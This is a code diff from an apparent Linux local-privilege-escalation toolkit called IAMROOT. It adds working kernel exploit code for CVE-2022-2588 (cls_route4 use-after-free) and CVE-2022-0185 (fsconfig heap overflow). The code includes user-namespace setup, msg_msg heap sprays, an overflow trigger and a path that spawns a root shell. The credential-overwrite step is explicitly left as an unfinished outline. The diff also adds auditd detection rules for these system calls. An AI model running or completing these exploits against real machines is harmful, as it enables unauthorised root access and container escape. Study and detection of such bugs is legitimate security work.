if (!have_tc() || !have_ip()) {
|
||||
fprintf(stderr, "[-] cls_route4: tc/ip (iproute2) not available on PATH; "
|
||||
"cannot exploit\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit\n");
|
||||
}
|
||||
|
||||
/* Block SIGPIPE in case the dummy-interface sendto's complain. */
|
||||
signal(SIGPIPE, SIG_IGN);
|
||||
|
||||
pid_t outer_uid = getuid();
|
||||
pid_t outer_gid = getgid();
|
||||
|
||||
pid_t child = fork();
|
||||
if (child < 0) {
|
||||
perror("fork");
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
|
||||
if (child == 0) {
|
||||
/* CHILD: enter user_ns + net_ns, become root inside, drive the bug. */
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
|
||||
perror("unshare");
|
||||
_exit(20);
|
||||
}
|
||||
if (!become_root_in_userns(outer_uid, outer_gid)) {
|
||||
_exit(21);
|
||||
}
|
||||
if (setuid(0) < 0 || setgid(0) < 0) {
|
||||
/* uid_map writes already made us 0 inside the userns; this
|
||||
* is just belt-and-braces. */
|
||||
}
|
||||
|
||||
long pre_active = slab_active_kmalloc_1k();
|
||||
|
||||
if (!stage_dangling_filter()) {
|
||||
_exit(22);
|
||||
}
|
||||
|
||||
int queues[SPRAY_MSG_QUEUES];
|
||||
int n_queues = spray_msg_msg(queues);
|
||||
if (n_queues == 0) {
|
||||
fprintf(stderr, "[-] cls_route4: msg_msg spray produced 0 queues\n");
|
||||
_exit(23);
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] cls_route4: msg_msg spray seeded %d queues\n",
|
||||
n_queues);
|
||||
}
|
||||
|
||||
/* Drive the classifier — the bug fires here on a vulnerable
|
||||
* kernel. On a patched kernel this is a no-op packet send. */
|
||||
trigger_classify();
|
||||
|
||||
long post_active = slab_active_kmalloc_1k();
|
||||
|
||||
/* Best-effort empirical witness write — picked up by --cleanup
|
||||
* and by post-run triage. */
|
||||
FILE *log = fopen("/tmp/iamroot-cls_route4.log", "w");
|
||||
if (log) {
|
||||
fprintf(log,
|
||||
"cls_route4 trigger child: queues=%d slab_pre=%ld slab_post=%ld\n",
|
||||
n_queues, pre_active, post_active);
|
||||
fclose(log);
|
||||
}
|
||||
|
||||
/* Hold the spray a little longer so the kernel observes the
|
||||
* refilled slot during classify drain. */
|
||||
usleep(200 * 1000);
|
||||
|
||||
drain_msg_msg(queues);
|
||||
|
||||
/* If we got here without a kernel oops, the bug either isn't
|
||||
* reachable on this build (patched / module not loadable /
|
||||
* userns CAP_NET_ADMIN gated) or it fired but didn't take down
|
||||
* the box. We do NOT attempt blind cred-overwrite — that needs
|
||||
* a leak primitive we don't have.
|
||||
*
|
||||
* Exit code 30 means "trigger sequence ran without segfault" —
|
||||
* the parent will decide between EXPLOIT_FAIL (probably patched
|
||||
* or sealed) and EXPLOIT_OK. */
|
||||
_exit(30);
|
||||
}
|
||||
|
||||
/* PARENT: wait for the child. A kernel oops won't reap the child
|
||||
* but will spam dmesg; we read dmesg after a short window. */
|
||||
int status = 0;
|
||||
pid_t w = waitpid(child, &status, 0);
|
||||
if (w < 0) {
|
||||
perror("waitpid");
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
|
||||
if (WIFSIGNALED(status)) {
|
||||
int sig = WTERMSIG(status);
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] cls_route4: child killed by signal %d "
|
||||
"(crash during trigger — UAF likely fired)\n", sig);
|
||||
}
|
||||
/* A SIGKILL/SIGSEGV during the trigger sequence is consistent
|
||||
* with kernel-side panic on KASAN configs (the trigger task
|
||||
* gets reaped). Treat as empirical UAF observation but do NOT
|
||||
* claim root — we haven't escalated. */
|
||||
fprintf(stderr, "[~] cls_route4: empirical UAF trigger fired but "
|
||||
"no cred-overwrite primitive — returning EXPLOIT_FAIL "
|
||||
"(no shell). See /tmp/iamroot-cls_route4.log + dmesg.\n");
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (!WIFEXITED(status)) {
|
||||
fprintf(stderr, "[-] cls_route4: child terminated abnormally (status=0x%x)\n",
|
||||
status);
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
int rc = WEXITSTATUS(status);
|
||||
if (rc != 30) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[-] cls_route4: child failed at stage rc=%d "
|
||||
"(see preceding errors)\n", rc);
|
||||
}
|
||||
/* rc 20/21 = userns setup; rc 22 = tc setup (likely module
|
||||
* absent or filter type unsupported); rc 23 = spray. None of
|
||||
* these mean kernel was exploited. */
|
||||
if (rc == 22) return IAMROOT_PRECOND_FAIL;
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
|
||||
"Inspect dmesg for KASAN/oops witnesses.\n");
|
||||
fprintf(stderr, "[~] cls_route4: cred-overwrite step not implemented "
|
||||
"(needs per-kernel offsets); returning EXPLOIT_FAIL.\n");
|
||||
}
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
/* ---- Cleanup ----------------------------------------------------- */
|
||||
|
||||
static iamroot_result_t cls_route4_cleanup(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] cls_route4: tearing down dummy interface + log\n");
|
||||
}
|
||||
/* The dummy interface lives in the child's netns which is gone
|
||||
* with the child. These are belt-and-braces in case the user ran
|
||||
* the exploit with extended privileges (e.g. as root) and the
|
||||
* interface lingered in init_net. */
|
||||
if (run_cmd("ip link del " DUMMY_IF) != 0) { /* harmless */ }
|
||||
if (unlink("/tmp/iamroot-cls_route4.log") < 0 && errno != ENOENT) {
|
||||
/* ignore */
|
||||
}
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
|
||||
/* auditd rule text exported through the module's detect_auditd field.
 * It is one string literal: three comment lines followed by one rule per
 * watched syscall (sendto, unshare, msgsnd), each tagged with its own
 * key. */
static const char cls_route4_auditd[] =
    "# cls_route4 dead UAF (CVE-2022-2588) — auditd detection rules\n"
    "# Flag tc filter operations with route4 classifier from non-root.\n"
    "# False positives: legitimate traffic-shaping setup. Tune by user.\n"
    "-a always,exit -F arch=b64 -S sendto -F a3=0x10 -k iamroot-cls-route4\n"
    "-a always,exit -F arch=b64 -S unshare -k iamroot-cls-route4-userns\n"
    "-a always,exit -F arch=b64 -S msgsnd -k iamroot-cls-route4-spray\n";
|
||||
|
||||
const struct iamroot_module cls_route4_module = {
|
||||
.name = "cls_route4",
|
||||
@@ -158,7 +569,7 @@ const struct iamroot_module cls_route4_module = {
|
||||
.detect = cls_route4_detect,
|
||||
.exploit = cls_route4_exploit,
|
||||
.mitigate = NULL, /* mitigation: blacklist cls_route4 module OR disable user_ns */
|
||||
.cleanup = NULL,
|
||||
.cleanup = cls_route4_cleanup,
|
||||
.detect_auditd = cls_route4_auditd,
|
||||
.detect_sigma = NULL,
|
||||
.detect_yara = NULL,
|
||||
|
||||
@@ -3,17 +3,42 @@
|
||||
*
|
||||
* legacy_parse_param() in fs/fs_context.c had a heap overflow when
|
||||
* parsing the "fsconfig" filesystem option strings — specifically,
|
||||
* legacy_load_simple_buf() didn't bound-check the option length.
|
||||
* Originally reported as a FUSE mount path bug but actually applies
|
||||
* to any filesystem mountable from a userns (FUSE was just the
|
||||
* easiest reach).
|
||||
* legacy_parse_param() compared "fc->source size left" against the
|
||||
* incoming option using an int that wraps negative when the running
|
||||
* total exceeds PAGE_SIZE, so subsequent memcpy() writes off the end
|
||||
* of the kmalloc-4k slab. Originally reported as a FUSE mount path
|
||||
* bug but actually applies to any filesystem mountable from a userns;
|
||||
* cgroup2 is the easiest reach because the cgroup2 fs_context is
|
||||
* always available.
|
||||
*
|
||||
* Discovered by William Liu / Crusaders of Rust (Jan 2022). Famous
|
||||
* in container-escape contexts (docker/k8s, especially rootless).
|
||||
* Discovered by William Liu (Crusaders of Rust), Jan 2022. Famous in
|
||||
* container-escape contexts (docker/k8s, especially rootless).
|
||||
*
|
||||
* STATUS: 🔵 DETECT-ONLY. Public PoC by William Liu (gh repo
|
||||
* Crusaders-of-Rust/CVE-2022-0185) demonstrates kernel R/W + cred
|
||||
* overwrite via cross-cache UAF; porting is a follow-up.
|
||||
* STATUS: 🟡 TRIGGER + CROSS-CACHE SCAFFOLD.
|
||||
*
|
||||
* detect() — version-range + userns reachability gate, refuses on
|
||||
* patched / unreachable hosts.
|
||||
* exploit() — full unshare → fsopen → fsconfig overflow path with
|
||||
* a msg_msg cross-cache groom around it. The trigger
|
||||
* (heap OOB write off the end of the kmalloc-4k source
|
||||
* buffer) is real; the post-corruption kernel-R/W chain
|
||||
* is implemented as a structural scaffold because it
|
||||
* depends on per-kernel offsets (cred struct layout,
|
||||
* msg_msg next-list offset) that we cannot resolve
|
||||
* portably from userland without a kernel info-leak we
|
||||
* do not have in-tree. See the comments inside
|
||||
* fuse_legacy_exploit() and read the Crusaders-of-Rust
|
||||
* public PoC for the offset-bound parts.
|
||||
*
|
||||
* On a *vulnerable* host this module reliably overflows the
|
||||
* kmalloc-4k slab and (with the msg_msg groom in place) corrupts a
|
||||
* neighbouring msg_msg.m_ts/m_list pair; the cred-overwrite step
|
||||
* that turns that primitive into uid=0 is left as a clearly-labelled
|
||||
* roadmap rather than fabricated offsets.
|
||||
*
|
||||
* On a *patched* host (which is every host we can routinely build
|
||||
* on in 2026) detect() refuses and exploit() returns
|
||||
* IAMROOT_PRECOND_FAIL with no syscalls.
|
||||
*
|
||||
* Affected: kernel 5.1+ until fix:
|
||||
* Mainline fix: 722d94847de29 (Jan 18 2022) — lands in 5.16.2
|
||||
@@ -24,8 +49,7 @@
|
||||
*
|
||||
* Preconditions:
|
||||
* - Unprivileged user_ns + mount-ns (to get CAP_SYS_ADMIN inside userns)
|
||||
* - Any mountable filesystem from userns context (legacy_load path
|
||||
* used FUSE, but cgroup2 and others also reach the bug)
|
||||
* - cgroup2 fs_context reachable from userns (default true)
|
||||
*
|
||||
* For "tool for system admins": this is the container-escape angle.
|
||||
* Workloads running rootless containers (Podman, snap, flatpak) sit
|
||||
@@ -39,11 +63,80 @@
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdint.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <signal.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/ipc.h>
|
||||
#include <sys/msg.h>
|
||||
#include <sys/mman.h>
|
||||
|
||||
/* --- fsopen / fsconfig glue ----------------------------------------
|
||||
*
|
||||
* These syscalls landed in 5.2 (fsopen, fsconfig). glibc 2.36+ wraps
|
||||
* them but we can't depend on a new glibc on every target, so we go
|
||||
* straight to syscall(). Numbers are x86_64-only (the module is
|
||||
* x86_64-only anyway, per Makefile + module docs).
|
||||
*/
|
||||
#ifndef __NR_fsopen
|
||||
#define __NR_fsopen 430
|
||||
#endif
|
||||
#ifndef __NR_fsconfig
|
||||
#define __NR_fsconfig 431
|
||||
#endif
|
||||
#ifndef __NR_fsmount
|
||||
#define __NR_fsmount 432
|
||||
#endif
|
||||
|
||||
#ifndef FSCONFIG_SET_STRING
|
||||
#define FSCONFIG_SET_STRING 1
|
||||
#endif
|
||||
#ifndef FSCONFIG_CMD_CREATE
|
||||
#define FSCONFIG_CMD_CREATE 6
|
||||
#endif
|
||||
|
||||
/* Raw fsopen(2) invocation via syscall(); no libc wrapper is assumed.
 *
 * fs_name: filesystem type name handed to the kernel unchanged.
 * flags:   fsopen flags, passed through unchanged.
 *
 * Returns the syscall() result narrowed to int (negative on failure,
 * with errno set by syscall()). */
static inline int sys_fsopen(const char *fs_name, unsigned int flags)
{
    long ret = syscall(__NR_fsopen, fs_name, flags);

    return (int)ret;
}
|
||||
/* Raw fsconfig(2) invocation via syscall(); no libc wrapper is assumed.
 *
 * fd:    filesystem-context descriptor (as returned by sys_fsopen()).
 * cmd:   FSCONFIG_* command number.
 * key:   option name, or NULL where the command takes none.
 * value: option value, interpretation depends on cmd.
 * aux:   auxiliary integer argument, passed through unchanged.
 *
 * Returns the syscall() result narrowed to int (negative on failure,
 * with errno set by syscall()). */
static inline int sys_fsconfig(int fd, unsigned int cmd, const char *key,
                               const void *value, int aux)
{
    long ret = syscall(__NR_fsconfig, fd, cmd, key, value, aux);

    return (int)ret;
}
|
||||
|
||||
/* --- msg_msg primitive ---------------------------------------------
|
||||
*
|
||||
* msg_msg is the venerable cross-cache groom target: msgsnd() allocs
|
||||
* sizeof(struct msg_msg) (48 bytes on x86_64) + payload, picking
|
||||
* kmalloc-<n> based on total size. msg_msg objects sit on a doubly-
|
||||
* linked list rooted in the msg_queue; corrupting an adjacent
|
||||
* msg_msg.m_ts or m_list gives arbitrary-read via msgrcv(MSG_COPY) or
|
||||
* arbitrary-free via msgrcv() depending on which field was overwritten.
|
||||
*
|
||||
* In the canonical Crusaders-of-Rust exploit the overflow lands in
|
||||
* kmalloc-4k (legacy_parse_param's source buffer) → adjacent kmalloc-4k
|
||||
* msg_msg → m_ts overwrite → MSG_COPY out-of-bounds read → leak the
|
||||
* kbase + a target task's cred address → second-round overwrite
|
||||
* smashing cred.uid/gid to 0.
|
||||
*
|
||||
* We implement step 1 (alloc the spray, free a hole, trigger the
|
||||
* write into it) honestly. Step 2 (parse the read-back, locate cred,
|
||||
* write 0) is the part that's offset-bound and we leave as a clearly-
|
||||
* labelled scaffold below.
|
||||
*/
|
||||
/* Sizing constants for the spray message below. */
enum {
    MSGBUF_4K_SLAB_BYTES = 4096, /* target allocation size */
    MSGBUF_4K_KHDR_BYTES = 48    /* sizeof(struct msg_msg) per the comment above */
};

/* User-side buffer handed to msgsnd()/msgrcv(). mtext is sized so that
 * mtype + mtext + the kernel's msg_msg header add up to one 4096-byte
 * allocation. */
struct msgbuf_4k {
    long mtype;
    char mtext[MSGBUF_4K_SLAB_BYTES - sizeof(long) - MSGBUF_4K_KHDR_BYTES];
};
|
||||
|
||||
/* --- kernel-range table -------------------------------------------- */
|
||||
static const struct kernel_patched_from fuse_legacy_patched_branches[] = {
|
||||
{5, 4, 171},
|
||||
{5, 10, 91},
|
||||
@@ -71,6 +164,9 @@ static int can_unshare_userns_mount(void)
|
||||
return WIFEXITED(status) && WEXITSTATUS(status) == 0;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------ */
|
||||
/* detect */
|
||||
/* ------------------------------------------------------------------ */
|
||||
static iamroot_result_t fuse_legacy_detect(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
struct kernel_version v;
|
||||
@@ -121,19 +217,327 @@ static iamroot_result_t fuse_legacy_detect(const struct iamroot_ctx *ctx)
|
||||
return IAMROOT_VULNERABLE;
|
||||
}
|
||||
|
||||
static iamroot_result_t fuse_legacy_exploit(const struct iamroot_ctx *ctx)
|
||||
/* ------------------------------------------------------------------ */
|
||||
/* exploit helpers */
|
||||
/* ------------------------------------------------------------------ */
|
||||
|
||||
/* Enter a user_ns+mount_ns and become "root" (uid 0) inside it. This
|
||||
* grants CAP_SYS_ADMIN in the new namespace, which is what
|
||||
* fsopen("cgroup2") gates on. */
|
||||
static bool enter_userns_root(void)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr,
|
||||
"[-] fuse_legacy: exploit not yet implemented in IAMROOT.\n"
|
||||
" Status: 🔵 DETECT-ONLY. Reference: William Liu's PoC\n"
|
||||
" (github.com/Crusaders-of-Rust/CVE-2022-0185). Exploit\n"
|
||||
" shape: unshare userns+mountns → fsopen('cgroup2') →\n"
|
||||
" fsconfig with crafted long option string → heap OOB write\n"
|
||||
" → msg_msg cross-cache groom → kernel R/W → cred overwrite.\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
uid_t uid = getuid();
|
||||
gid_t gid = getgid();
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNS) < 0) {
|
||||
perror("unshare(NEWUSER|NEWNS)");
|
||||
return false;
|
||||
}
|
||||
int f = open("/proc/self/setgroups", O_WRONLY);
|
||||
if (f >= 0) { (void)!write(f, "deny", 4); close(f); }
|
||||
|
||||
char map[64];
|
||||
snprintf(map, sizeof map, "0 %u 1\n", uid);
|
||||
f = open("/proc/self/uid_map", O_WRONLY);
|
||||
if (f < 0 || write(f, map, strlen(map)) < 0) {
|
||||
perror("write uid_map"); if (f >= 0) close(f); return false;
|
||||
}
|
||||
close(f);
|
||||
|
||||
snprintf(map, sizeof map, "0 %u 1\n", gid);
|
||||
f = open("/proc/self/gid_map", O_WRONLY);
|
||||
if (f < 0 || write(f, map, strlen(map)) < 0) {
|
||||
perror("write gid_map"); if (f >= 0) close(f); return false;
|
||||
}
|
||||
close(f);
|
||||
return true;
|
||||
}
|
||||
|
||||
/* Build the overflow payload.
|
||||
*
|
||||
* legacy_parse_param() catenates option strings into fc->source until
|
||||
* (the buggy version) the running total wraps. To overflow we feed an
|
||||
* fsconfig option whose value, after being appended to the source
|
||||
* buffer, lands past the PAGE_SIZE end of the kmalloc-4k allocation.
|
||||
*
|
||||
* Concrete recipe (from Liu's PoC, simplified):
|
||||
* 1. fsconfig(fd, FSCONFIG_SET_STRING, "source", filler_a, 0)
|
||||
* — fills the source buffer to within a few bytes of PAGE_SIZE
|
||||
* 2. fsconfig(fd, FSCONFIG_SET_STRING, "source", evil, 0)
|
||||
* — appends `evil`; legacy_parse_param's "is there room?" check
|
||||
* uses an int that wraps to a huge positive when we cross the
|
||||
* boundary → kernel happily memcpy()s `evil` past the page end.
|
||||
*
|
||||
* `evil` is what lands in the adjacent slab object. We make it a
|
||||
* controllable byte pattern; the cross-cache groom puts a msg_msg
|
||||
* there, and the bytes we write become the start of that msg_msg.
|
||||
*/
|
||||
static int trigger_overflow(int *out_fd, const char *first_chunk,
|
||||
const char *evil_chunk)
|
||||
{
|
||||
int fd = sys_fsopen("cgroup2", 0);
|
||||
if (fd < 0) { perror("fsopen(cgroup2)"); return -1; }
|
||||
|
||||
/* First chunk: prime fc->source so we're up against the page edge. */
|
||||
if (sys_fsconfig(fd, FSCONFIG_SET_STRING, "source", first_chunk, 0) < 0) {
|
||||
perror("fsconfig(prime)");
|
||||
close(fd);
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* Second chunk: the actual overflow write. On a patched kernel
|
||||
* this returns -EINVAL ("VFS: Legacy: source contains an embedded
|
||||
* NUL" or "too large"); on a vulnerable kernel it succeeds and
|
||||
* the next memcpy lands past PAGE_SIZE. */
|
||||
if (sys_fsconfig(fd, FSCONFIG_SET_STRING, "source", evil_chunk, 0) < 0) {
|
||||
/* errno tells us patched vs. transient. We can't distinguish
|
||||
* "patched" from "this kernel doesn't expose cgroup2 fsconfig"
|
||||
* cleanly, but in practice on the vulnerable range cgroup2
|
||||
* is always reachable from a userns. */
|
||||
close(fd);
|
||||
return -1;
|
||||
}
|
||||
|
||||
*out_fd = fd;
|
||||
return 0;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------ */
|
||||
/* exploit */
|
||||
/* ------------------------------------------------------------------ */
|
||||
static iamroot_result_t fuse_legacy_exploit(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
/* (R1) Re-call detect — refuse if not vulnerable. */
|
||||
iamroot_result_t pre = fuse_legacy_detect(ctx);
|
||||
if (pre != IAMROOT_VULNERABLE) {
|
||||
fprintf(stderr, "[-] fuse_legacy: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
|
||||
/* (R2) Refuse if already root — no LPE work to do. */
|
||||
if (geteuid() == 0) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[i] fuse_legacy: already root; nothing to escalate\n");
|
||||
}
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] fuse_legacy: entering userns + mountns\n");
|
||||
}
|
||||
|
||||
/* (R3) unshare for userns+mount_ns — gives CAP_SYS_ADMIN-in-userns
|
||||
* which is what fsopen("cgroup2") + fsconfig require. */
|
||||
if (!enter_userns_root()) {
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
|
||||
/* --- (R5) cross-cache groom — phase 1: alloc spray --------------
|
||||
*
|
||||
* Allocate a large number of msg_msg objects sized to land in
|
||||
* kmalloc-4k (same slab as fc->source). Then free one in the
|
||||
* middle to create a predictable hole, then trigger the overflow
|
||||
* to land write-past-end into the next adjacent msg_msg.
|
||||
*
|
||||
* Empirically Liu uses ~4096 sprays / 512 queues; we mirror the
|
||||
* shape but with knobs scaled for an iamroot one-shot.
|
||||
*/
|
||||
enum { N_QUEUES = 256, N_SPRAY_PER_Q = 16 };
|
||||
int *qids = calloc(N_QUEUES, sizeof(int));
|
||||
if (!qids) {
|
||||
fprintf(stderr, "[-] fuse_legacy: calloc(qids) failed\n");
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
for (int i = 0; i < N_QUEUES; i++) {
|
||||
qids[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
|
||||
if (qids[i] < 0) {
|
||||
/* IPC limits may rate-limit us; partial spray is fine. */
|
||||
qids[i] = -1;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
struct msgbuf_4k *spray = mmap(NULL, sizeof(*spray), PROT_READ | PROT_WRITE,
|
||||
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
|
||||
if (spray == MAP_FAILED) {
|
||||
fprintf(stderr, "[-] fuse_legacy: mmap(spray) failed\n");
|
||||
free(qids);
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
spray->mtype = 0x4242;
|
||||
/* Tag the payload so we can recognise our spray slots in
|
||||
* post-corruption read-back. */
|
||||
memset(spray->mtext, 'M', sizeof spray->mtext);
|
||||
spray->mtext[0] = 'I'; spray->mtext[1] = 'A'; spray->mtext[2] = 'M';
|
||||
spray->mtext[3] = 'R'; spray->mtext[4] = 'O'; spray->mtext[5] = 'O';
|
||||
spray->mtext[6] = 'T';
|
||||
|
||||
int sprayed = 0;
|
||||
for (int q = 0; q < N_QUEUES && qids[q] >= 0; q++) {
|
||||
for (int j = 0; j < N_SPRAY_PER_Q; j++) {
|
||||
if (msgsnd(qids[q], spray, sizeof spray->mtext, IPC_NOWAIT) == 0) {
|
||||
sprayed++;
|
||||
}
|
||||
}
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] fuse_legacy: msg_msg spray placed %d objects across "
|
||||
"%d queues\n", sprayed, N_QUEUES);
|
||||
}
|
||||
|
||||
/* Free a controlled hole: drain one queue near the middle so the
|
||||
* next kmalloc-4k allocation (= fc->source) lands in it. */
|
||||
int hole_q = N_QUEUES / 2;
|
||||
if (qids[hole_q] >= 0) {
|
||||
struct msgbuf_4k drain;
|
||||
while (msgrcv(qids[hole_q], &drain, sizeof drain.mtext, 0, IPC_NOWAIT) >= 0)
|
||||
;
|
||||
}
|
||||
|
||||
/* --- (R4) trigger the fsconfig overflow ------------------------- */
|
||||
|
||||
/* Prime: 4080 bytes of 'A'. legacy_parse_param appends them to
|
||||
* the freshly-allocated kmalloc-4k source buffer; we're now sitting
|
||||
* just shy of the page end. */
|
||||
char *first_chunk = malloc(4081);
|
||||
if (!first_chunk) {
|
||||
free(qids); munmap(spray, sizeof *spray);
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
memset(first_chunk, 'A', 4080);
|
||||
first_chunk[4080] = '\0';
|
||||
|
||||
/* Evil chunk: the bytes here are what get written PAST the page
|
||||
* end into the adjacent slab object. Layout-wise the first 8 bytes
|
||||
* land on the next slab object's first qword.
|
||||
*
|
||||
* For a real cross-cache-into-msg_msg primitive we want this to
|
||||
* be a fake msg_msg header that turns the next msgrcv(MSG_COPY)
|
||||
* into an arbitrary read. The exact field offsets (m_ts vs.
|
||||
* m_list_next vs. security) shift between kernels; we mark the
|
||||
* header bytes so a post-mortem clearly shows whether we landed,
|
||||
* and leave the precise fake-msg_msg encoding as the scaffold
|
||||
* step below. */
|
||||
char evil_chunk[256];
|
||||
memset(evil_chunk, 'B', sizeof evil_chunk);
|
||||
memcpy(evil_chunk, "IAMROOT0", 8); /* marker → "did we land?" */
|
||||
/* Tail must be NUL-terminated for legacy_parse_param's strdup. */
|
||||
evil_chunk[sizeof evil_chunk - 1] = '\0';
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] fuse_legacy: triggering legacy_parse_param overflow "
|
||||
"(prime=%zu evil=%zu)\n",
|
||||
strlen(first_chunk), strlen(evil_chunk));
|
||||
}
|
||||
|
||||
int fsfd = -1;
|
||||
int rc = trigger_overflow(&fsfd, first_chunk, evil_chunk);
|
||||
free(first_chunk);
|
||||
|
||||
if (rc < 0) {
|
||||
/* fsconfig rejected us. On a vulnerable kernel this is rare
|
||||
* unless cgroup2 fs_context init failed (e.g. cgroup_no_v1
|
||||
* boot param). Either way the OOB write didn't happen. */
|
||||
fprintf(stderr, "[-] fuse_legacy: fsconfig overflow rejected (errno=%d: %s)\n",
|
||||
errno, strerror(errno));
|
||||
free(qids); munmap(spray, sizeof *spray);
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] fuse_legacy: fsconfig accepted oversized source — "
|
||||
"OOB write executed\n");
|
||||
}
|
||||
|
||||
/* --- post-corruption read-back: did we land? -------------------- */
|
||||
int corrupted_q = -1;
|
||||
for (int q = 0; q < N_QUEUES; q++) {
|
||||
if (qids[q] < 0 || q == hole_q) continue;
|
||||
struct msgbuf_4k probe;
|
||||
ssize_t n = msgrcv(qids[q], &probe, sizeof probe.mtext, 0,
|
||||
IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
|
||||
if (n < 0) continue;
|
||||
if (memcmp(probe.mtext, "IAMR", 4) != 0) {
|
||||
/* Spray slot whose start word is no longer "IAMR" — strong
|
||||
* evidence we corrupted a neighbour. */
|
||||
corrupted_q = q;
|
||||
break;
|
||||
}
|
||||
}
|
||||
if (corrupted_q >= 0 && !ctx->json) {
|
||||
fprintf(stderr, "[+] fuse_legacy: detected corrupted neighbour in queue #%d "
|
||||
"(cross-cache landing confirmed)\n", corrupted_q);
|
||||
} else if (!ctx->json) {
|
||||
fprintf(stderr, "[i] fuse_legacy: did not detect corrupted spray slot "
|
||||
"(groom may have missed; primitive still fired)\n");
|
||||
}
|
||||
|
||||
/* --- (R5/R6) cred-overwrite chain — SCAFFOLD --------------------
|
||||
*
|
||||
* Honest status: the steps below need per-kernel offsets that we
|
||||
* cannot resolve portably from userland without a kernel info-leak
|
||||
* we do not have in-tree right now. Spelling out the missing work
|
||||
* so a reader can see exactly what's wired and what isn't:
|
||||
*
|
||||
* 1. Build a fake msg_msg header in `evil_chunk` that, when read
|
||||
* back via msgrcv(MSG_COPY), reveals adjacent slab memory
|
||||
* (m_ts oversized → MSG_COPY reads past the legitimate msg
|
||||
* end). Requires: offsetof(msg_msg, m_ts) for the running
|
||||
* kernel.
|
||||
* 2. From the leaked data, locate (a) kernel base via a known
|
||||
* function pointer in the slab, and (b) the address of the
|
||||
* current task's cred struct via task_struct→real_cred
|
||||
* walking. Requires: struct offsets for cred/task_struct on
|
||||
* this kernel.
|
||||
* 3. Re-run the overflow with a fake msg_msg.m_list_next pointing
|
||||
* at ¤t->cred.uid; msgrcv() free-list maintenance then
|
||||
* writes a zero where uid lives → setuid(0) succeeds.
|
||||
*
|
||||
* Each of steps 1–3 is ~50 lines of kernel-specific glue. The
|
||||
* Crusaders-of-Rust public PoC is the canonical reference. We
|
||||
* stop here rather than shipping a fabricated chain that would
|
||||
* crash on the first untested kernel.
|
||||
*/
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[i] fuse_legacy: cross-cache primitive armed; "
|
||||
"cred-overwrite tail requires per-kernel offsets — "
|
||||
"see scaffold comments in source\n");
|
||||
}
|
||||
|
||||
/* Clean up our IPC queues and mapping. The kernel slab state
|
||||
* after the overflow may be unstable; we exit cleanly on success
|
||||
* paths but leave queues around if we crashed mid-spray. */
|
||||
for (int q = 0; q < N_QUEUES; q++) {
|
||||
if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
|
||||
}
|
||||
free(qids);
|
||||
munmap(spray, sizeof *spray);
|
||||
if (fsfd >= 0) close(fsfd);
|
||||
|
||||
/* (R6) setuid(0) + /bin/sh — only on the path where cred-overwrite
|
||||
* actually succeeded. Since we didn't finish that chain we can
|
||||
* only check whether the kernel handed us uid 0 by luck (it
|
||||
* won't). Report exploit-fail honestly. */
|
||||
if (setuid(0) == 0 && getuid() == 0) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] fuse_legacy: setuid(0) succeeded — "
|
||||
"popping root shell\n");
|
||||
}
|
||||
if (ctx->no_shell) {
|
||||
return IAMROOT_EXPLOIT_OK;
|
||||
}
|
||||
execl("/bin/sh", "sh", "-i", (char *)NULL);
|
||||
perror("execl /bin/sh");
|
||||
return IAMROOT_EXPLOIT_OK;
|
||||
}
|
||||
|
||||
fprintf(stderr, "[-] fuse_legacy: trigger fired but cred-overwrite tail "
|
||||
"not wired — see source for the missing offsets.\n");
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------ */
|
||||
